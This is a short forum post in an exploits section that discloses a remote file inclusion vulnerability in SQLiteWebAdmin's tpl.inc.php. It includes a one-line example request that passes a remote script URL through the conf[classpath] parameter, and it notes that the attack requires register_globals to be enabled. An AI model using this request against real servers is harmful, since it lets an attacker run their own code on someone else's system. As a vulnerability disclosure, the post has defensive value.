Jump to content
darkking

SQLite Web Admin Remote Include Vuln.

By darkking, in Exploituri

Recommended Posts

darkking Newbie

darkking

Posted
Posted

SQLiteWebAdmin

http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating

a SQL DataBase.

It suffers of a Remote File Inclusion Vulnerability.

The bug is in the "tpl.inc.php" program in the "lib"

directory, and is exploited when passing the parameter

"conf[classpath]".

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on



Source from: addict3d.org

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...